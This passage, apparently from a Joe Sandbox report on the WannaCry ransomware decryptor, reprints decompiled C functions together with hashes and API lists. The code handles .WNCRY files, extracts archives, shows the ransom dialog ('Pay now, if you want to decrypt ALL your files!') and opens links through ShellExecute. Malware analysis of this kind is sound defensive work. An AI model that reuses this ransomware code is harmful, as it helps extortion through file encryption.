                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessageSend$#3092$#1641Create$#4710BrushFontSolid
                                                      • String ID: Arial
                                                      • API String ID: 1126252797-493054409
                                                      • Opcode ID: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction ID: f8dd995afa615cab71677879a74d6ff7c2e305333cbfc3da3be905e2a6067967
                                                      • Opcode Fuzzy Hash: 1de1fe04c409b87552040b023bf9e037168031db0fca800ba09ccd0f6b59f890
                                                      • Instruction Fuzzy Hash: CC21C6B13507107FE625A764DD86FAA2759BBC8B40F10011EB345AB2D1CAF5EC41879C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 72%
                                                      			E00402560(intOrPtr __ecx, WCHAR* _a4) {
                                                      				short _v720;
                                                      				intOrPtr _v724;
                                                      				void* _t21;
                                                      				void* _t22;
                                                      				WCHAR* _t23;
                                                      				void* _t30;
                                                      				short* _t31;
                                                      				intOrPtr* _t32;
                                                      				void* _t34;
                                                      				void* _t36;
                                                      
                                                      				_t23 = _a4;
                                                      				_v724 = __ecx;
                                                      				_t30 = 0;
                                                      				wcscpy( &_v720, _t23);
                                                      				_t31 = wcsrchr( &_v720, 0x2e);
                                                      				_t34 =  &_v724 + 0x10;
                                                      				if(_t31 == 0) {
                                                      					L4:
                                                      					wcscat( &_v720, L".org");
                                                      				} else {
                                                      					_t32 = __imp___wcsicmp;
                                                      					_t21 =  *_t32(_t31, L".WNCRY");
                                                      					_t36 = _t34 + 8;
                                                      					if(_t21 == 0) {
                                                      						L3:
                                                      						 *_t31 = 0;
                                                      						_t30 = 1;
                                                      					} else {
                                                      						_t22 =  *_t32(_t31, L".WNCYR");
                                                      						_t34 = _t36 + 8;
                                                      						if(_t22 != 0) {
                                                      							goto L4;
                                                      						} else {
                                                      							goto L3;
                                                      						}
                                                      					}
                                                      				}
                                                      				if(E004020A0(_v724, _t23,  &_v720) == 0) {
                                                      					DeleteFileW( &_v720);
                                                      					goto L11;
                                                      				} else {
                                                      					if(DeleteFileW(_t23) == 0) {
                                                      						L11:
                                                      						return 0;
                                                      					} else {
                                                      						if(_t30 != 0) {
                                                      							return 1;
                                                      						} else {
                                                      							return MoveFileW( &_v720, _t23);
                                                      						}
                                                      					}
                                                      				}
                                                      			}














                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                                      • String ID: .WNCRY$.WNCYR$.org
                                                      • API String ID: 1016768320-4283512309
                                                      • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                                      • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                                      • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 95%
                                                      			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                      				void* _v0;
                                                      				char _v260;
                                                      				struct _FILETIME _v268;
                                                      				struct _FILETIME _v276;
                                                      				struct _FILETIME _v284;
                                                      				void* _v292;
                                                      				void* _v296;
                                                      				signed int _v304;
                                                      				char _v560;
                                                      				struct _OVERLAPPED* _v820;
                                                      				void* _v824;
                                                      				void* _v827;
                                                      				void* _v828;
                                                      				long _v829;
                                                      				void* _v836;
                                                      				intOrPtr _t68;
                                                      				long _t77;
                                                      				void* _t81;
                                                      				void* _t82;
                                                      				void* _t90;
                                                      				void* _t91;
                                                      				long _t94;
                                                      				signed int _t97;
                                                      				long _t99;
                                                      				void* _t106;
                                                      				int _t116;
                                                      				long _t121;
                                                      				signed int _t132;
                                                      				signed int _t138;
                                                      				unsigned int _t140;
                                                      				signed int _t141;
                                                      				void* _t154;
                                                      				intOrPtr* _t157;
                                                      				intOrPtr _t166;
                                                      				void* _t174;
                                                      				signed int _t175;
                                                      				signed int _t176;
                                                      				long _t177;
                                                      				signed int _t178;
                                                      				signed int _t179;
                                                      				intOrPtr* _t180;
                                                      				void* _t182;
                                                      				long _t183;
                                                      				intOrPtr* _t185;
                                                      				void* _t187;
                                                      				void* _t191;
                                                      				void* _t192;
                                                      
                                                      				_t166 = _a16;
                                                      				_t132 = __ecx;
                                                      				if(_t166 == 3) {
                                                      					_t68 =  *((intOrPtr*)(__ecx + 4));
                                                      					_t176 = _a4;
                                                      					__eflags = _t176 - _t68;
                                                      					if(_t176 == _t68) {
                                                      						L14:
                                                      						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
                                                      						__eflags = _t177;
                                                      						if(_t177 <= 0) {
                                                      							E00411AC0( *_t132);
                                                      							 *(_t132 + 4) = 0xffffffff;
                                                      						}
                                                      						__eflags = _v829;
                                                      						if(_v829 == 0) {
                                                      							__eflags = _t177;
                                                      							if(_t177 <= 0) {
                                                      								asm("sbb eax, eax");
                                                      								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
                                                      								__eflags = _t77;
                                                      								return _t77;
                                                      							} else {
                                                      								return 0x600;
                                                      							}
                                                      						} else {
                                                      							__eflags = 0;
                                                      							return 0;
                                                      						}
                                                      					} else {
                                                      						__eflags = _t68 - 0xffffffff;
                                                      						if(_t68 != 0xffffffff) {
                                                      							E00411AC0( *((intOrPtr*)(__ecx)));
                                                      							_t187 = _t187 + 4;
                                                      						}
                                                      						_t81 =  *_t132;
                                                      						 *(_t132 + 4) = 0xffffffff;
                                                      						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
                                                      						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
                                                      							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
                                                      							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
                                                      								E00411390(_t81);
                                                      								_t187 = _t187 + 4;
                                                      							}
                                                      							_t82 =  *_t132;
                                                      							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                                      							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
                                                      								E004113E0(_t82);
                                                      								_t82 =  *_t132;
                                                      								_t187 = _t187 + 4;
                                                      								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
                                                      							}
                                                      							_push( *((intOrPtr*)(_t132 + 0x138)));
                                                      							_push( *_t132);
                                                      							E00411660();
                                                      							_t187 = _t187 + 8;
                                                      							 *(_t132 + 4) = _t176;
                                                      							goto L14;
                                                      						} else {
                                                      							return 0x10000;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					if(_t166 == 2 || _t166 == 1) {
                                                      						_t178 = _t175 | 0xffffffff;
                                                      						__eflags =  *(_t132 + 4) - _t178;
                                                      						if( *(_t132 + 4) != _t178) {
                                                      							E00411AC0( *_t132);
                                                      							_t187 = _t187 + 4;
                                                      						}
                                                      						_t90 =  *_t132;
                                                      						 *(_t132 + 4) = _t178;
                                                      						_t179 = _a4;
                                                      						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
                                                      						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
                                                      							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
                                                      							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
                                                      								E00411390(_t90);
                                                      								_t187 = _t187 + 4;
                                                      							}
                                                      							_t91 =  *_t132;
                                                      							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                                      							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
                                                      								E004113E0(_t91);
                                                      								_t91 =  *_t132;
                                                      								_t187 = _t187 + 4;
                                                      								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
                                                      							}
                                                      							_t138 = _t132;
                                                      							E00411CF0(_t138, _t179,  &_v560);
                                                      							__eflags = _v304 & 0x00000010;
                                                      							if((_v304 & 0x00000010) == 0) {
                                                      								__eflags = _t166 - 1;
                                                      								if(_t166 != 1) {
                                                      									_t157 = _a8;
                                                      									_t185 = _t157;
                                                      									_t180 = _t157;
                                                      									_t94 =  *_t157;
                                                      									__eflags = _t94;
                                                      									while(_t94 != 0) {
                                                      										__eflags = _t94 - 0x2f;
                                                      										if(_t94 == 0x2f) {
                                                      											L43:
                                                      											_t185 = _t180 + 1;
                                                      										} else {
                                                      											__eflags = _t94 - 0x5c;
                                                      											if(_t94 == 0x5c) {
                                                      												goto L43;
                                                      											}
                                                      										}
                                                      										_t94 =  *((intOrPtr*)(_t180 + 1));
                                                      										_t180 = _t180 + 1;
                                                      										__eflags = _t94;
                                                      									}
                                                      									asm("repne scasb");
                                                      									_t140 =  !(_t138 | 0xffffffff);
                                                      									_v828 =  &_v820;
                                                      									_t182 = _t157 - _t140;
                                                      									_t141 = _t140 >> 2;
                                                      									_t97 = memcpy(_v828, _t182, _t141 << 2);
                                                      									__eflags = _t185 - _t157;
                                                      									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
                                                      									_t191 = _t187 + 0x18;
                                                      									if(__eflags != 0) {
                                                      										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
                                                      										_t99 = _v820;
                                                      										__eflags = _t99 - 0x2f;
                                                      										if(_t99 == 0x2f) {
                                                      											L55:
                                                      											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
                                                      											E00412250(0, _t191 + 0x2c);
                                                      											_t187 = _t191 + 0x18;
                                                      											goto L48;
                                                      										} else {
                                                      											__eflags = _t99 - 0x5c;
                                                      											if(_t99 == 0x5c) {
                                                      												goto L55;
                                                      											} else {
                                                      												__eflags = _t99;
                                                      												if(_t99 == 0) {
                                                      													goto L47;
                                                      												} else {
                                                      													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
                                                      													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
                                                      														goto L47;
                                                      													} else {
                                                      														goto L55;
                                                      													}
                                                      												}
                                                      											}
                                                      										}
                                                      										goto L73;
                                                      									} else {
                                                      										_v820 = 0;
                                                      										L47:
                                                      										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
                                                      										E00412250(_t132 + 0x140, _t191 + 0x30);
                                                      										_t187 = _t191 + 0x1c;
                                                      									}
                                                      									L48:
                                                      									_t174 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0);
                                                      								} else {
                                                      									_t174 = _a8;
                                                      								}
                                                      								__eflags = _t174 - 0xffffffff;
                                                      								if(_t174 != 0xffffffff) {
                                                      									_push( *((intOrPtr*)(_t132 + 0x138)));
                                                      									_push( *_t132);
                                                      									E00411660();
                                                      									_t106 =  *(_t132 + 0x13c);
                                                      									_t192 = _t187 + 8;
                                                      									__eflags = _t106;
                                                      									if(_t106 == 0) {
                                                      										_push(0x4000);
                                                      										L00412CEC();
                                                      										_t192 = _t192 + 4;
                                                      										 *(_t132 + 0x13c) = _t106;
                                                      									}
                                                      									_v820 = 0;
                                                      									while(1) {
                                                      										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
                                                      										_t192 = _t192 + 0x10;
                                                      										__eflags = _t183 - 0xffffff96;
                                                      										if(_t183 == 0xffffff96) {
                                                      											break;
                                                      										}
                                                      										__eflags = _t183;
                                                      										if(__eflags < 0) {
                                                      											L68:
                                                      											_v820 = 0x5000000;
                                                      										} else {
                                                      											if(__eflags <= 0) {
                                                      												L63:
                                                      												__eflags =  *(_t192 + 0x13);
                                                      												if( *(_t192 + 0x13) != 0) {
                                                      													SetFileTime(_t174,  &_v276,  &_v284,  &_v268);
                                                      												} else {
                                                      													__eflags = _t183;
                                                      													if(_t183 == 0) {
                                                      														goto L68;
                                                      													} else {
                                                      														continue;
                                                      													}
                                                      												}
                                                      											} else {
                                                      												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0);
                                                      												__eflags = _t116;
                                                      												if(_t116 == 0) {
                                                      													_v820 = 0x400;
                                                      												} else {
                                                      													goto L63;
                                                      												}
                                                      											}
                                                      										}
                                                      										L70:
                                                      										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
                                                      										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
                                                      											CloseHandle(_t174);
                                                      										}
                                                      										E00411AC0( *_t132);
                                                      										return _v820;
                                                      										goto L73;
                                                      									}
                                                      									_v820 = 0x1000;
                                                      									goto L70;
                                                      								} else {
                                                      									return 0x200;
                                                      								}
                                                      							} else {
                                                      								__eflags = _t166 - 1;
                                                      								if(_t166 != 1) {
                                                      									_t154 = _a8;
                                                      									_t121 =  *_t154;
                                                      									__eflags = _t121 - 0x2f;
                                                      									if(_t121 == 0x2f) {
                                                      										L36:
                                                      										E00412250(0, _t154);
                                                      										__eflags = 0;
                                                      										return 0;
                                                      									} else {
                                                      										__eflags = _t121 - 0x5c;
                                                      										if(_t121 == 0x5c) {
                                                      											goto L36;
                                                      										} else {
                                                      											__eflags = _t121;
                                                      											if(_t121 == 0) {
                                                      												L37:
                                                      												E00412250(_t132 + 0x140, _t154);
                                                      												__eflags = 0;
                                                      												return 0;
                                                      											} else {
                                                      												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
                                                      												if( *((char*)(_t154 + 1)) != 0x3a) {
                                                      													goto L37;
                                                      												} else {
                                                      													goto L36;
                                                      												}
                                                      											}
                                                      										}
                                                      									}
                                                      								} else {
                                                      									__eflags = 0;
                                                      									return 0;
                                                      								}
                                                      							}
                                                      						} else {
                                                      							return 0x10000;
                                                      						}
                                                      					} else {
                                                      						return 0x10000;
                                                      					}
                                                      				}
                                                      				L73:
                                                      			}


                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID: %s%s$%s%s%s$:
                                                      • API String ID: 0-3034790606
                                                      • Opcode ID: 3f912c73aaf125ccd319ec4db5002a1de97c0c32fb0a3ff325c86f975f1c75c1
                                                      • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                                      • Opcode Fuzzy Hash: 3f912c73aaf125ccd319ec4db5002a1de97c0c32fb0a3ff325c86f975f1c75c1
                                                      • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 80%
                                                      			_entry_(void* __ebx, void* __edi, void* __esi) {
                                                      				CHAR* _v8;
                                                      				intOrPtr* _v24;
                                                      				intOrPtr _v28;
                                                      				struct _STARTUPINFOA _v96;
                                                      				int _v100;
                                                      				char** _v104;
                                                      				int _v108;
                                                      				void _v112;
                                                      				char** _v116;
                                                      				intOrPtr* _v120;
                                                      				intOrPtr _v124;
                                                      				intOrPtr* _t23;
                                                      				intOrPtr* _t24;
                                                      				void* _t27;
                                                      				void _t29;
                                                      				intOrPtr _t36;
                                                      				signed int _t38;
                                                      				int _t40;
                                                      				intOrPtr* _t41;
                                                      				intOrPtr _t42;
                                                      				intOrPtr _t46;
                                                      				intOrPtr _t47;
                                                      				intOrPtr _t49;
                                                      				intOrPtr* _t55;
                                                      				intOrPtr _t58;
                                                      				intOrPtr _t61;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(0x41baa8);
                                                      				_push(0x413050);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t58;
                                                      				_v28 = _t58 - 0x68;
                                                      				_v8 = 0;
                                                      				__set_app_type(2);
                                                      				 *0x422298 =  *0x422298 | 0xffffffff;
                                                      				 *0x42229c =  *0x42229c | 0xffffffff;
                                                      				_t23 = __p__fmode();
                                                      				_t46 =  *0x42228c; // 0x0
                                                      				 *_t23 = _t46;
                                                      				_t24 = __p__commode();
                                                      				_t47 =  *0x422288; // 0x0
                                                      				 *_t24 = _t47;
                                                      				 *0x422294 = _adjust_fdiv;
                                                      				_t27 = E004133C7( *_adjust_fdiv);
                                                      				_t61 =  *0x421790; // 0x1
                                                      				if(_t61 == 0) {
                                                      					__setusermatherr(E004133C4);
                                                      				}
                                                      				E004133B2(_t27);
                                                      				_push(0x41f018);
                                                      				_push(0x41f014);
                                                      				L004133AC();
                                                      				_t29 =  *0x422284; // 0x0
                                                      				_v112 = _t29;
                                                      				__getmainargs( &_v100,  &_v116,  &_v104,  *0x422280,  &_v112);
                                                      				_push(0x41f010);
                                                      				_push(0x41f000);
                                                      				L004133AC();
                                                      				_t55 =  *_acmdln;
                                                      				_v120 = _t55;
                                                      				if( *_t55 != 0x22) {
                                                      					while( *_t55 > 0x20) {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				} else {
                                                      					do {
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      						_t42 =  *_t55;
                                                      					} while (_t42 != 0 && _t42 != 0x22);
                                                      					if( *_t55 == 0x22) {
                                                      						L6:
                                                      						_t55 = _t55 + 1;
                                                      						_v120 = _t55;
                                                      					}
                                                      				}
                                                      				_t36 =  *_t55;
                                                      				if(_t36 != 0 && _t36 <= 0x20) {
                                                      					goto L6;
                                                      				}
                                                      				_v96.dwFlags = 0;
                                                      				GetStartupInfoA( &_v96);
                                                      				if((_v96.dwFlags & 0x00000001) == 0) {
                                                      					_t38 = 0xa;
                                                      				} else {
                                                      					_t38 = _v96.wShowWindow & 0x0000ffff;
                                                      				}
                                                      				_t40 = E004133E6(GetModuleHandleA(0), _t39, 0, _t55, _t38);
                                                      				_v108 = _t40;
                                                      				exit(_t40);
                                                      				_t41 = _v24;
                                                      				_t49 =  *((intOrPtr*)( *_t41));
                                                      				_v124 = _t49;
                                                      				_push(_t41);
                                                      				_push(_t49);
                                                      				L004133A6();
                                                      				return _t41;
                                                      			}

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _initterm$FilterHandleInfoModuleStartupXcpt__getmainargs__p__commode__p__fmode__set_app_type__setusermatherrexit
                                                      • String ID:
                                                      • API String ID: 801014965-0
                                                      • Opcode ID: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction ID: fcecf6e401754473f6225594f41014142e7d5ca2867d00c097f2044c16acc313
                                                      • Opcode Fuzzy Hash: 9f29f74fa0ca4091ce937db24ce742eca73e17089ce00c114469281514e7078a
                                                      • Instruction Fuzzy Hash: F9419F71940308EFCB20DFA4DC45AE97BB9EB09711B20016FF855972A1D7788A81CB6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 82%
                                                      			E00404280(void* __ecx, char _a8) {
                                                      				void* _t9;
                                                      				struct HWND__* _t10;
                                                      				long _t12;
                                                      				long* _t22;
                                                      				void* _t24;
                                                      
                                                      				_t24 = __ecx;
                                                      				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
                                                      					E00404530(__ecx);
                                                      				}
                                                      				_t9 = E004045E0(_t24,  &_a8);
                                                      				if(_t9 == 0) {
                                                      					L6:
                                                      					L00412CBC();
                                                      					return _t9;
                                                      				} else {
                                                      					_t22 = _t24 + 0x44;
                                                      					_push(0);
                                                      					_push("mailto:");
                                                      					L00412DB2();
                                                      					if(_t9 != 0) {
                                                      						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
                                                      						goto L6;
                                                      					} else {
                                                      						_t10 = GetParent( *(_t24 + 0x20));
                                                      						_push(_t10);
                                                      						L00412DAC();
                                                      						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
                                                      						L00412CBC();
                                                      						return _t12;
                                                      					}
                                                      				}
                                                      			}

                                                      APIs
                                                      • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                                      • GetParent.USER32(?), ref: 004042BB
                                                      • #2864.MFC42(00000000), ref: 004042C2
                                                      • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                                      • #2379.MFC42 ref: 004042DD
                                                        • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                                        • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                                        • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                                        • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                                        • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                                      • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                                      • #2379.MFC42(?), ref: 004042FF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_37_2_400000_@WanaDecryptor@.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                                      • String ID: mailto:$open
                                                      • API String ID: 1144735033-2326261162
                                                      • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                                      • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                                      • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 70%
                                                      			E004038F0(void* __ecx, void* __ebp) {
                                                      				long _v4;
                                                      				intOrPtr _v16;
                                                      				char _v1252;
                                                      				char _v1284;
                                                      				void* __edi;
                                                      				int _t20;
                                                      				int _t23;
                                                      				void* _t30;
                                                      				long _t48;
                                                      				void* _t50;
                                                      				intOrPtr _t53;
                                                      				void* _t54;
                                                      
                                                      				_push(0xffffffff);
                                                      				_push(E0041367B);
                                                      				_push( *[fs:0x0]);
                                                      				 *[fs:0x0] = _t53;
                                                      				_t54 = _t53 - 0x4f8;
                                                      				_t50 = __ecx;
                                                      				E00403EB0( *[fs:0x0], __ecx, 0);
                                                      				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
                                                      				if(_t20 != 0xffffffff) {
                                                      					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
                                                      					_t57 =  *((intOrPtr*)(_t48 + 8));
                                                      					if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                                      						E00403AF0(_t48, __ebp);
                                                      					}
                                                      					E00401E90( &_v1252, _t57);
                                                      					_v4 = 0;
                                                      					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
                                                      					_t54 = _t54 + 0xc;
                                                      					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
                                                      						_t30 = E00403A20( &_v1252, _t48);
                                                      						__eflags = _t30;
                                                      						if(_t30 != 0) {
                                                      							_push(0);
                                                      							_push(0x40);
                                                      							_push("All your files have been decrypted!");
                                                      							goto L8;
                                                      						}
                                                      					} else {
                                                      						if( *((intOrPtr*)(_t48 + 8)) == 0) {
                                                      							_push(0);
                                                      							_push(0x40);
                                                      							_push("Pay now, if you want to decrypt ALL your files!");
                                                      							L8:
                                                      							L00412CC8();
                                                      						}
                                                      					}
                                                      					_v4 = 0xffffffff;
                                                      					_t20 = E00401F30( &_v1252);
                                                      				}
                                                      				E00403EB0(_t20, _t50, 1);
                                                      				_t23 = CloseHandle( *(_t50 + 0xf4));
                                                      				 *(_t50 + 0xf4) = 0;
                                                      				 *[fs:0x0] = _v16;
                                                      				return _t23;
                                                      			}

                                                      APIs
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                                        • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                                        • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                                      • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                                      • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                                      • sprintf.MSVCRT ref: 0040397A
                                                      • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                                        • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                                        • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                                        • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                                        • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                                      • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                                      Strings
                                                      • All your files have been decrypted!, xrefs: 004039C3
                                                      • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                                      • %08X.dky, xrefs: 00403969
                                                      Memory Dump Source
                                                      • Source File: 00000025.00000002.7374567660.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000025.00000002.7374496167.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7374876187.0000000000415000.00000002.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375046059.000000000041F000.00000008.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375131130.0000000000421000.00000004.00000001.01000000.00000009.sdmp
                                                      • Associated: 00000025.00000002.7375238880.0000000000423000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
